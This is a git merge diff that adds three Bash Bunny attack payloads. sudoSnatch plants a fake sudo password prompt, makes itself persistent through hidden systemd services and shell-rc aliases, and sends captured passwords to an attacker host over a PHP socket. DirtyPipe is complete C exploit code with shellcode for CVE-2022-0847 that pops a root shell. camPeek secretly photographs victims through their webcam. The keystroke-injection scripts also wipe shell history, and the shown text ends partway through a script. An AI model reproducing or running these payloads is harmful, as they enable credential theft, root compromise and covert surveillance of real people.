Merge branch 'hak5:master' into master
commit
a91c2b80d0
|
@ -0,0 +1,48 @@
|
||||||
|
## About:
|
||||||
|
* Title: sudoSnatch
|
||||||
|
* Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Credentials
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Plain text passwords.
|
||||||
|
* Detailed password logs.
|
||||||
|
* Persistent
|
||||||
|
* Autostart payload on boot.
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
* Injecting payload on target's system.
|
||||||
|
* Checks whether internet is connected to the target system.
|
||||||
|
* If internet is connected then it sends clear text passwords to attacker.
|
||||||
|
|
||||||
|
### Changes to be made in payload.sh:
|
||||||
|
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
|
||||||
|
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
|
||||||
|
|
||||||
|
### LED Status:
|
||||||
|
* `SETUP` : MAGENTA
|
||||||
|
* `ATTACK` : YELLOW
|
||||||
|
* `FINISH` : GREEN
|
||||||
|
|
||||||
|
### Directory Structure of payload components:
|
||||||
|
| FileName | Directory |
|
||||||
|
| -------------- | ----------------------------- |
|
||||||
|
| payload.txt | /payloads/switch1/ |
|
||||||
|
| payload.sh | /payloads/ |
|
||||||
|
| shell | /payloads/library/sudoSnatch/ |
|
||||||
|
| systemMgr | /payloads/library/sudoSnatch/ |
|
||||||
|
|
||||||
|
* Note: Create directory named `sudoSnatch` in `/payloads/library/`
|
||||||
|
### Usage:
|
||||||
|
1. Inject payload into target's system.
|
||||||
|
2. Start netcat listner on attacking system:
|
||||||
|
|
||||||
|
* `nc -l -p <port number>` use this command to fetch passwords.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
|
mkdir /var/tmp/.system
|
||||||
|
lol=$(lsblk | grep 1.8G)
|
||||||
|
disk=$(echo $lol | awk '{print $1}')
|
||||||
|
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||||
|
cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
|
||||||
|
chmod +x /var/tmp/.system/systemMgr
|
||||||
|
touch /var/tmp/.system/sysLog
|
||||||
|
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||||
|
chmod +x /var/tmp/.system/systemBus
|
||||||
|
mkdir -p ~/.config/systemd/user
|
||||||
|
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
|
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||||
|
chmod +x /var/tmp/.system/reboot
|
||||||
|
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
|
||||||
|
systemctl --user daemon-reload
|
||||||
|
systemctl --user enable --now systemBUS.service
|
||||||
|
systemctl --user start --now systemBUS.service
|
||||||
|
systemctl --user enable --now reboot.service
|
||||||
|
systemctl --user start --now reboot.service
|
||||||
|
cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
|
||||||
|
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
|
|
@ -0,0 +1,56 @@
|
||||||
|
# Title: sudoSnatch
|
||||||
|
# Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Credentials
|
||||||
|
# Target: Unix-like operating systems with systemd.
|
||||||
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE STORAGE HID
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
LED ATTACK
|
||||||
|
Q DELAY 1000
|
||||||
|
Q CTRL-ALT t
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# [Prevent storing history]
|
||||||
|
Q STRING unset HISTFILE
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Fetching BashBunny's block device]
|
||||||
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Mounting BashBunny]
|
||||||
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1400
|
||||||
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [transfering payload script]
|
||||||
|
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||||
|
Q ENTER
|
||||||
|
Q STRING chmod +x /tmp/payload.sh
|
||||||
|
Q ENTER
|
||||||
|
Q STRING /tmp/./payload.sh
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 5000
|
||||||
|
Q STRING rm /tmp/payload.sh
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# [Unmounting BashBunny]
|
||||||
|
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,12 @@
|
||||||
|
#!/bin/bash
|
||||||
|
ls -a ~/ | grep 'zshrc' &> /dev/null
|
||||||
|
if [ $? = 0 ]; then
|
||||||
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
||||||
|
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
|
||||||
|
fi
|
||||||
|
|
||||||
|
ls -a ~/ | grep 'bashrc' &> /dev/null
|
||||||
|
if [ $? = 0 ]; then
|
||||||
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
||||||
|
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
|
||||||
|
fi
|
|
@ -0,0 +1,5 @@
|
||||||
|
#!/bin/bash
|
||||||
|
echo -n "[sudo] password for $(whoami):"
|
||||||
|
IFS="" read -s pass
|
||||||
|
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
|
||||||
|
echo -e "\nSorry, try again."
|
|
@ -0,0 +1,24 @@
|
||||||
|
## About:
|
||||||
|
* Title: DirtyPipe
|
||||||
|
* Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution
|
||||||
|
* Target: Linux operating systems.
|
||||||
|
* Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
## DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.
|
||||||
|
|
||||||
|
### Directory Structure of payload components:
|
||||||
|
| FileName | Directory |
|
||||||
|
| -------------- | ----------------------------- |
|
||||||
|
| payload.txt | /payloads/ |
|
||||||
|
| dirtypipe.c | /payloads/library/ |
|
||||||
|
|
||||||
|
### LED Status:
|
||||||
|
* `SETUP` : MAGENTA
|
||||||
|
* `ATTACK` : YELLOW
|
||||||
|
* `FINISH` : GREEN
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,181 @@
|
||||||
|
#define _GNU_SOURCE
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
#include <sys/user.h>
|
||||||
|
#include <stdint.h>
|
||||||
|
|
||||||
|
#ifndef PAGE_SIZE
|
||||||
|
#define PAGE_SIZE 4096
|
||||||
|
#endif
|
||||||
|
|
||||||
|
// small (linux x86_64) ELF file matroshka doll that does;
|
||||||
|
// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
|
||||||
|
// write(fd, elfcode, elfcode_len)
|
||||||
|
// chmod("/tmp/sh", 04755)
|
||||||
|
// close(fd);
|
||||||
|
// exit(0);
|
||||||
|
//
|
||||||
|
// the dropped ELF simply does:
|
||||||
|
// setuid(0);
|
||||||
|
// setgid(0);
|
||||||
|
// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
|
||||||
|
unsigned char elfcode[] = {
|
||||||
|
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
|
||||||
|
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
|
||||||
|
0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
|
||||||
|
0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
|
||||||
|
0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
|
||||||
|
0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
|
||||||
|
0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
|
||||||
|
0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
|
||||||
|
0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
|
||||||
|
0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
|
||||||
|
0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
|
||||||
|
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
|
||||||
|
0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||||
|
0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
|
||||||
|
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
|
||||||
|
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
|
||||||
|
0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
|
||||||
|
0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
|
||||||
|
0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
|
||||||
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
|
||||||
|
* PIPE_BUF_FLAG_CAN_MERGE flag set.
|
||||||
|
*/
|
||||||
|
static void prepare_pipe(int p[2])
|
||||||
|
{
|
||||||
|
if (pipe(p)) abort();
|
||||||
|
|
||||||
|
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
|
||||||
|
static char buffer[4096];
|
||||||
|
|
||||||
|
/* fill the pipe completely; each pipe_buffer will now have
|
||||||
|
the PIPE_BUF_FLAG_CAN_MERGE flag */
|
||||||
|
for (unsigned r = pipe_size; r > 0;) {
|
||||||
|
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
|
||||||
|
write(p[1], buffer, n);
|
||||||
|
r -= n;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* drain the pipe, freeing all pipe_buffer instances (but
|
||||||
|
leaving the flags initialized) */
|
||||||
|
for (unsigned r = pipe_size; r > 0;) {
|
||||||
|
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
|
||||||
|
read(p[0], buffer, n);
|
||||||
|
r -= n;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* the pipe is now empty, and if somebody adds a new
|
||||||
|
pipe_buffer without initializing its "flags", the buffer
|
||||||
|
will be mergeable */
|
||||||
|
}
|
||||||
|
|
||||||
|
int hax(char *filename, long offset, uint8_t *data, size_t len) {
|
||||||
|
/* open the input file and validate the specified offset */
|
||||||
|
const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
|
||||||
|
if (fd < 0) {
|
||||||
|
perror("open failed");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
struct stat st;
|
||||||
|
if (fstat(fd, &st)) {
|
||||||
|
perror("stat failed");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* create the pipe with all flags initialized with
|
||||||
|
PIPE_BUF_FLAG_CAN_MERGE */
|
||||||
|
int p[2];
|
||||||
|
prepare_pipe(p);
|
||||||
|
|
||||||
|
/* splice one byte from before the specified offset into the
|
||||||
|
pipe; this will add a reference to the page cache, but
|
||||||
|
since copy_page_to_iter_pipe() does not initialize the
|
||||||
|
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
|
||||||
|
--offset;
|
||||||
|
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
|
||||||
|
if (nbytes < 0) {
|
||||||
|
perror("splice failed");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
if (nbytes == 0) {
|
||||||
|
fprintf(stderr, "short splice\n");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* the following write will not create a new pipe_buffer, but
|
||||||
|
will instead write into the page cache, because of the
|
||||||
|
PIPE_BUF_FLAG_CAN_MERGE flag */
|
||||||
|
nbytes = write(p[1], data, len);
|
||||||
|
if (nbytes < 0) {
|
||||||
|
perror("write failed");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
if ((size_t)nbytes < len) {
|
||||||
|
fprintf(stderr, "short write\n");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
|
||||||
|
close(fd);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char **argv) {
|
||||||
|
if (argc != 2) {
|
||||||
|
fprintf(stderr, "Usage: %s SUID\n", argv[0]);
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
char *path = argv[1];
|
||||||
|
uint8_t *data = elfcode;
|
||||||
|
|
||||||
|
int fd = open(path, O_RDONLY);
|
||||||
|
uint8_t *orig_bytes = malloc(sizeof(elfcode));
|
||||||
|
lseek(fd, 1, SEEK_SET);
|
||||||
|
read(fd, orig_bytes, sizeof(elfcode));
|
||||||
|
close(fd);
|
||||||
|
|
||||||
|
printf("[+] hijacking suid binary..\n");
|
||||||
|
if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
|
||||||
|
printf("[~] failed\n");
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("[+] dropping suid shell..\n");
|
||||||
|
system(path);
|
||||||
|
|
||||||
|
printf("[+] restoring suid binary..\n");
|
||||||
|
if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
|
||||||
|
printf("[~] failed\n");
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
|
||||||
|
system("/tmp/sh");
|
||||||
|
|
||||||
|
return EXIT_SUCCESS;
|
||||||
|
}
|
|
@ -0,0 +1,82 @@
|
||||||
|
# Title: DirtyPipe
|
||||||
|
# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: Linux operating systems.
|
||||||
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE STORAGE HID
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
LED ATTACK
|
||||||
|
Q DELAY 1000
|
||||||
|
Q CTRL-ALT t
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# [Prevent storing history]
|
||||||
|
Q STRING unset HISTFILE
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING HISTSIZE=0
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING rm -f '$HISTFILE'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
|
||||||
|
# [Fetching BashBunny's block device]
|
||||||
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Mounting BashBunny]
|
||||||
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 2000
|
||||||
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# [transfering and executing exploit]
|
||||||
|
Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 1000
|
||||||
|
Q STRING chmod +x /tmp/dirtypipe
|
||||||
|
Q ENTER
|
||||||
|
Q STRING /tmp/./dirtypipe /bin/bash
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
Q STRING sudo su
|
||||||
|
Q ENTER
|
||||||
|
Q CTRL-ALT t
|
||||||
|
Q DELAY 500
|
||||||
|
Q STRING rm /tmp/dirtypipe
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING rm /tmp/dirtypipe.c
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Unmounting BashBunny]
|
||||||
|
Q STRING unset HISTFILE
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,55 @@
|
||||||
|
## About:
|
||||||
|
* Title: camPeek
|
||||||
|
* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Execution
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Robust Payload for capturing targets images.
|
||||||
|
* No additional dependencies required.
|
||||||
|
* Persistent.
|
||||||
|
* Autostart payload on boot.
|
||||||
|
|
||||||
|
### Payload:
|
||||||
|
* Payload is divided into two modules:
|
||||||
|
1) Deployment: In this stage payload is deployed in targets system.
|
||||||
|
2) Exfiltration: Storing saved loot from targets system in bunny.
|
||||||
|
|
||||||
|
### Payload Script's Workflow:
|
||||||
|
* Stop storing histroy.
|
||||||
|
* Grep bunny's mount point of bunny.
|
||||||
|
* Creating hidden directory in /var/tmp/..... for obfuscation.
|
||||||
|
* Copying ffmpeg and image capturing mechanism in target's system.
|
||||||
|
* Creating systemd service for persistance and triggering mechanism for autostart.
|
||||||
|
|
||||||
|
### Changes to be made:
|
||||||
|
* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
|
||||||
|
|
||||||
|
### LED Status:
|
||||||
|
* `SETUP` : MAGENTA
|
||||||
|
* `ATTACK` : YELLOW
|
||||||
|
* `FINISH` : GREEN
|
||||||
|
|
||||||
|
### Note:
|
||||||
|
* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
|
||||||
|
* Due to big size of binary, it is not provided in this repo.
|
||||||
|
* Craete directory name `camPeek` in `/loot/` for storing captured images.
|
||||||
|
|
||||||
|
### Directory Structure of payload components:
|
||||||
|
| FileName | Directory |
|
||||||
|
| -------------- | ----------------------------- |
|
||||||
|
| switch1/payload.txt | /payloads/switch1/ |
|
||||||
|
| switch2/payload.txt | /payloads/switch2/ |
|
||||||
|
| camPeek/ | /payloads/libray/ |
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
1. Deploy first payload during absence of target using `switch1`.
|
||||||
|
2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/bin/bash
|
||||||
|
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
|
mkdir /var/tmp/.system
|
||||||
|
lol=$(lsblk | grep 1.8G)
|
||||||
|
disk=$(echo $lol | awk '{print $1}')
|
||||||
|
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||||
|
cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/
|
||||||
|
chmod +x /var/tmp/.system/ffmpeg
|
||||||
|
mkdir /var/tmp/.system/sysLog
|
||||||
|
cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
|
||||||
|
chmod +x /var/tmp/.system/systemBus
|
||||||
|
mkdir -p ~/.config/systemd/user
|
||||||
|
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
|
systemctl --user daemon-reload
|
||||||
|
systemctl --user enable --now systemBUS.service
|
||||||
|
systemctl --user start --now systemBUS.service
|
||||||
|
cp -r $mntt/payloads/library/camPeek/shell /tmp/
|
||||||
|
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
|
|
@ -0,0 +1,12 @@
|
||||||
|
#!/bin/bash
|
||||||
|
ls -a ~/ | grep 'zshrc' &> /dev/null
|
||||||
|
if [ $? = 0 ]; then
|
||||||
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
||||||
|
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
|
||||||
|
fi
|
||||||
|
|
||||||
|
ls -a ~/ | grep 'bashrc' &> /dev/null
|
||||||
|
if [ $? = 0 ]; then
|
||||||
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
||||||
|
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
|
||||||
|
fi
|
|
@ -0,0 +1,5 @@
|
||||||
|
while true;
|
||||||
|
do
|
||||||
|
/var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
|
||||||
|
sleep 120
|
||||||
|
done
|
|
@ -0,0 +1,56 @@
|
||||||
|
# Title: camPeek
|
||||||
|
# Description: camPeek payload peeks through targets web cam and capture images.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: GNU/Linux operating systems with systemd.
|
||||||
|
# Attackmodes: HID, Storage.
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE STORAGE HID
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
LED ATTACK
|
||||||
|
Q DELAY 1000
|
||||||
|
Q CTRL-ALT t
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# [Prevent storing history]
|
||||||
|
Q STRING unset HISTFILE
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Fetching BashBunny's block device]
|
||||||
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Mounting BashBunny]
|
||||||
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 2000
|
||||||
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# [transfering payload script]
|
||||||
|
Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
|
||||||
|
Q ENTER
|
||||||
|
Q STRING chmod +x /tmp/payload.sh
|
||||||
|
Q ENTER
|
||||||
|
